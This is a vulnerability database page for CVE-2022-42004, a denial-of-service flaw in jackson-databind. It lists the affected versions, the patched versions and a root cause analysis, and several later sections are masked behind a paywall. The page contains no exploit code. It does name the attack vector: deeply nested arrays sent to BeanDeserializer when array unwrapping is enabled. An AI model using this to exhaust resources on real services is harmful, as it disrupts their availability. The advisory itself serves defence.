Miggo Logo
Miggo Vulnerability Database
CVE-2022-42004

CVE-2022-42004: Uncontrolled Resource Consumption in FasterXML jackson-databind

7.5

CVSS Score
3.1

Basic Information

CVE ID
CVE-2022-42004
GHSA ID
GHSA-rgv9-q543-rqg4
EPSS Score
0.44626%
CWE
CWE-400
Published
10/3/2022
Updated
12/2/2024
KEV Status
No
Technology
TechnologyJava

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
com.fasterxml.jackson.core:jackson-databindmaven< 2.12.7.12.12.7.1
com.fasterxml.jackson.core:jackson-databindmaven>= 2.13.0, < 2.13.42.13.4

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from BeanDeserializer._deserializeFromArray's handling of array unwrapping. The commit diff shows a critical addition: a check for subsequent START_ARRAY tokens after initial array unwrapping. Prior to the patch, this function would recursively process nested arrays without depth validation when UNWRAP_SINGLE_VALUE_ARRAYS was enabled, leading to stack overflows or memory exhaustion. The test case modifications and CVE description explicitly reference this function as the attack vector. Other components like StdDeserializer were patched for similar issues in related CVEs (CVE-2022-42003), but this specific CVE-2022-42004 is tied to the BeanDeserializer implementation.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

In **st*rXML j**kson-**t**in* ***or* *.**.*.* *n* in *.**.x ***or* *.**.*, r*sour** *x**ustion **n o**ur ****us* o* * l**k o* * ****k in ***n**s*ri*liz*r._**s*ri*liz**rom*rr*y to pr*v*nt us* o* ***ply n*st** *rr*ys. T*is issu* **n only **pp*n w**n t*

Reasoning

T** vuln*r**ility st*ms *rom ***n**s*ri*liz*r._**s*ri*liz**rom*rr*y's **n*lin* o* *rr*y unwr*ppin*. T** *ommit *i** s*ows * *riti**l ***ition: * ****k *or su*s*qu*nt ST*RT_*RR*Y tok*ns **t*r initi*l *rr*y unwr*ppin*. Prior to t** p*t**, t*is *un*tion